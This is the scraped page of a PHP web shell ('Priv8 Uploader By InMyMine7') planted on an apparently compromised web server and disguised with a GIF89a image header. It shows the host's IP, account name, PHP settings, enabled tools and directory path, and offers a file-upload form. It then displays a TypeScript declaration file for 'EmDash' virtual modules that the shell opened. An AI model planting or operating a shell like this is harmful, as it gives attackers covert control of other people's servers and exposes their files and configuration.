GIF89a;
GIF89a;Priv8 Uploader By InMyMine7
Linux gallant-poincare.82-165-91-112.plesk.page 6.1.0-37-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.140-1 (2025-05-22) x86_64
Priv8 Uploader By InMyMine7
Linux gallant-poincare.82-165-91-112.plesk.page 6.1.0-37-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.140-1 (2025-05-22) x86_64
| Server IP : 82.165.91.112 / Your IP : 216.73.217.79 Web Server : Apache System : Linux gallant-poincare.82-165-91-112.plesk.page 6.1.0-37-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.140-1 (2025-05-22) x86_64 User : nr7.net_tfpqq467gv ( 10001) PHP Version : 8.4.25 Disable Function : opcache_get_status MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /var/www/vhosts/nr7.net/emdash.nr7.net/node_modules/emdash/src/ |
Upload File : |
/**
* Type declarations for EmDash virtual modules
*
* These modules are generated at build time by the Astro integration.
* They provide static imports for configured adapters (database, storage, auth).
*/
declare module "virtual:emdash/config" {
import type { I18nConfig } from "./i18n/config.js";
import type {
AuthDescriptor,
AuthProviderDescriptor,
DatabaseDescriptor,
StorageDescriptor,
} from "./index.js";
interface VirtualConfig {
database?: DatabaseDescriptor;
storage?: StorageDescriptor;
auth?: AuthDescriptor;
authProviders?: AuthProviderDescriptor[];
i18n?: I18nConfig | null;
}
const config: VirtualConfig;
export default config;
}
declare module "virtual:emdash/dialect" {
import type { Dialect, Kysely } from "kysely";
import type { DatabaseDialectType } from "./db/adapters.js";
// Can be undefined if no database configured, or the actual function
export const createDialect: ((config: unknown) => Dialect) | undefined;
export const dialectType: DatabaseDialectType | undefined;
/**
* Adapter-owned per-request scoping. Returns null when the configured
* adapter has no per-request semantics (non-D1, or D1 with sessions
* disabled). Otherwise returns a request-scoped Kysely and a commit
* callback to persist per-request state.
*/
export interface RequestScopedDbOpts {
config: unknown;
isAuthenticated: boolean;
isWrite: boolean;
cookies: {
get(name: string): { value: string } | undefined;
set(name: string, value: string, options: Record<string, unknown>): void;
};
url: URL;
}
export interface RequestScopedDb {
db: Kysely<unknown>;
commit: () => void;
}
export const createRequestScopedDb: (opts: RequestScopedDbOpts) => RequestScopedDb | null;
}
declare module "virtual:emdash/storage" {
import type { Storage } from "./storage/types.js";
// Can be undefined if no storage configured, or the actual function
export const createStorage: ((config: Record<string, unknown>) => Storage) | undefined;
}
declare module "virtual:emdash/auth" {
import type { AuthResult } from "./auth/types.js";
// Can be undefined if no external auth configured, or the actual function
export const authenticate:
| ((request: Request, config: unknown) => Promise<AuthResult>)
| undefined;
}
declare module "virtual:emdash/storage" {
import type { Storage } from "./storage/types.js";
export const createStorage: ((config: Record<string, unknown>) => Storage) | null;
}
declare module "virtual:emdash/auth" {
import type { AuthResult } from "./auth/types.js";
export const authenticate: ((request: Request, config: unknown) => Promise<AuthResult>) | null;
}
declare module "virtual:emdash/plugins" {
import type { ResolvedPlugin } from "./plugins/types.js";
export const plugins: ResolvedPlugin[];
}
declare module "virtual:emdash/sandbox-runner" {
import type { SandboxRunner, SandboxRunnerFactory, SandboxOptions } from "./plugins/types.js";
export const createSandboxRunner: SandboxRunnerFactory | null;
export const CloudflareSandboxRunner: (new (options: SandboxOptions) => SandboxRunner) | null;
}
declare module "virtual:emdash/sandboxed-plugins" {
import type { PluginDescriptor } from "./astro/integration/runtime.js";
export const sandboxedPlugins: PluginDescriptor[];
}
declare module "virtual:emdash/block-components" {
export const pluginBlockComponents: Record<string, unknown>;
}
declare module "virtual:emdash/auth-providers" {
import type { ComponentType } from "react";
interface AuthProviderEntry {
id: string;
label: string;
LoginButton?: ComponentType;
LoginForm?: ComponentType;
SetupStep?: ComponentType<{ onComplete: () => void }>;
}
export const authProviders: Record<string, AuthProviderEntry>;
}
declare module "virtual:emdash/wait-until" {
/**
* Optional host-provided lifetime extender for work deferred past the
* response. Resolves to Cloudflare's `waitUntil` under @astrojs/cloudflare;
* `undefined` on Node (fire-and-forget is safe on a long-lived process).
*/
export const waitUntil: ((promise: Promise<unknown>) => void) | undefined;
}
declare module "virtual:emdash/admin-registry" {
/**
* Plugin admin module registry.
* Each entry is the namespace import of the plugin's admin entry module.
* Convention for exports:
* - pages: Record<pageId, ComponentType>
* - widgets: Record<widgetId, ComponentType>
* - fields: Record<widgetName, ComponentType> (field widget renderers)
*/
export const pluginAdmins: Record<
string,
{
pages?: Record<string, unknown>;
widgets?: Record<string, unknown>;
fields?: Record<string, unknown>;
}
>;
}